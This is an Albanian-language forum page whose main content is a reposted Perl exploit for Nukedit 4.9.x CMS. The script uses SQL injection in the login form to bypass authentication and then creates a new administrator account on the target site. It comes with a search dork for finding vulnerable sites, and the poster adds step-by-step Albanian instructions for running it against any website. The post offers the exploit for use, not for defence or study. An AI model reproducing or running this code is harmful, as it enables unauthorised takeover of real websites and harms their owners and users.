ForumPortaliGalleryPytėsoriKėrkoLista AnėtarėveGrupet e AnėtarėveRegjistrohuidentifikimi
...:::Meny Kryesore:::...
 Home
 Portali
 Forum
 Lista e Antarve
 Galeria
 Lajmet Flash
 Profili
 FAQ
 Testi I Dashuris
favoritos.gif Media & Muzika
 Telivizionet Live
 Video Klipe
 Ruzulltatet Sportive
 Mp3 Falass
 Mp3 RAP
 Kerkesa Muzikore
 Melodi Per Celular
icon_community.gif Argėtim-Zbavitje
 Video Humoristike
 Luani Lojra
 Dezing
 Poezi
 Gediche
 Argėtime
 Albumi Fotografik
 Tema tė Ndryshme
som_downloads.gif Shkarkime & Links
King-Rap Tolbar
Programe
Shkarko Scripte
Chat Programs
 Kėrko nė Forum
 Liderėt e forumit
 Ndihmė
 Kėrko
Moti Momental

Permbajta e ksaj faqe kerkon flash player per instalim kliko mbi ket tekst.


Futu nė chat

Top 5 softuerėt antivirus pėr 2008
HTML clipboard
Top 5 softuerėt antivirus pėr 2008

1. Bit Defender

2. Kaspersky

3. Eset NOD32

4. Trend Micro Antivirus

    plus AntiSpyware 

5. F-Secure Anti-Virus 

SMS Falas nga KING-RaP
Partnerėt
>>> AlBaZeMeR <<<

XoFaCe

->>Ks-MaX <<<---

->> KoSoVa.Li <<<---

 ->> Muzik-Anglisht <<<---

V.I.P Galeri

Top posters
kanuni
 
Xhebraili
 
vissari
 
El-Fuego
 
drini-89
 
RiRi
 
dj-baba
 
dosti
 
king
 
miri
 
Keywords
meda double komandat kosoves PORNO beqiri loja dashurie 2012 genta numrin nika BAJRAM nokia elvana numri celular dashuri shkronja krasniqi gashi gjata murlan druri anglisht ismajli
IP Addressa Juaj&Reklama
IP


Share | 
 

 Nukedit 4.9.x Remote Create Admin Exploit

Shiko temėn e mėparshme Shiko temėn pasuese Shko poshtė 
AutoriMesazh
El-FuegoNumri i postimeve : 159
Join date : 12/06/2008
Age : 104
Location : Peja Morder City

MesazhTitulli: Nukedit 4.9.x Remote Create Admin Exploit   Thu Jun 12, 2008 8:28 pm

#!/usr/bin/perl############################################## ##############Title: Nukedit 4.9.x Create Admin Exploit ## ##Credit: r3dm0v3 ## http://r3dm0v3.persianblog.ir ## r3dm0v3[4t]yahoo[dot]com ## Tehran - Iran ## ##Download: http://www.nukedit.com/content/Download.asp ##Vulnerables: 4.9.x, prior versions maybe affected. ##Remote: Yes ##Dork: "Powered by Nukedit" ##Fix: Not Available ################################################## ##########use LWP::UserAgent;use HTTP::Cookies;$host = $ARGV[0];if (substr($host,length($host)-1,1) ne "/"){ $host.="/";}$usrmail = $ARGV[1];$passwd = $ARGV[2];$url = "http://".$host;$usrSQL= "' union select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737 e6da5b1b94707518619576129a915d0c2c',6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x";&Banner();if (@ARGV < 3) {&Usage();exit(1);}print "[~] Host: $host \n";print "[~] Email/Password: $usrmail/$passwd\n";print "[~] Logging in...\n";$xpl = LWP::UserAgent->new() || die;$cookie_jar = HTTP::Cookies->new();$xpl->cookie_jar( $cookie_jar );$res = $xpl->post($url.'utilities/login.asp',Content => ["redir" => "/nukedit/default.asp","email" => "$usrSQL","password" => "r3dm0v3","savepassword" => "false","submit" => "Login",],);if ($res->content =~ /Object Moved/){ print "[+] Logged in\n";}else{ print "[-] Can not login!\n"; exit();}print "[~] Creating Admin...\n";$res = $xpl->post($url.'utilities/useradmin.asp',Content => ["action" => "addDB","username" => "r3dm0v3","company" => "red move","url" => "http://r3dm0v3.persianblog.ir","address" => "a","county" => "b","zip" => "666","country" => "Iran","phone" => "66666666","fax" => "12345678","email" => "$usrmail","password" => "$passwd","groupid" => "1","submit1" => "Add User >>","IP" => "127.0.0.2",],);if ($res->content =~ /Object Moved/){ print "[+] Admin added. Login info:\n". " email: $usrmail\n". " password: $passwd\n";}else{ print "[-] Exploit failed!\n"; print $res->content;}sub Banner{print "################################################# ###########\n". "# Nukedit 4.9.x Create Admin Exploit #\n". "# by r3dm0v3 #\n". "# r3dm0v3[4t]yahoo[.]com #\n". "# http://r3dm0v3.persianblog.ir #\n". "################################################# ###########\n";}sub Usage(){print "\n Usage: nukedit.pl \n";print " ex. : nukedit.pl site.com/nukedit/ myname\@somewhere.com 123456\n";}# milw0rm.com [2008-02-26]
Per te Hapur Ket Exploit duhet te keni Prelin te Instaluar.
pra shum thjesht eshte se pari Exploitin qe eshte me nalt e beni copy dhe e qitni
ne Notepad dhe e beni sava as psh: hack.pl pra e ruani me nje
emer qe doni dhe me mbares .pl
pastaj e qitni ne C:/
dhe hym ne Start , Run, dhe CMD
dhe shkruajm kshtu: cd\ dhe enter
pastaj e shkruajm emrin e exploitit un e morra shembull hack.pl
dhe psh kshtu:hack.pl emriivebsajtit.com/ emalijot@hotmail.com 123456
dhe pastaj Enter
nqoft se kemi fat krijohet Admini dhe mund te Logiratesh dhe
pastaj eshte ne doren tendeSi te kerkosh ne Google.com:
dhe Pastaj merrni nje link dhe veproni si me nalt.
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit
 
Nukedit 4.9.x Remote Create Admin Exploit
Shiko temėn e mėparshme Shiko temėn pasuese Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: ..:: INFORMATIKA ::.. :: Exploits-
Kėrce tek: